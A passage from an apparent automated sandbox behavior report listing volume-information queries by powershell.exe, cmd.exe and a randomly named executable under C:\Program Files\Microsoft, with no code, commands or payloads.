                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
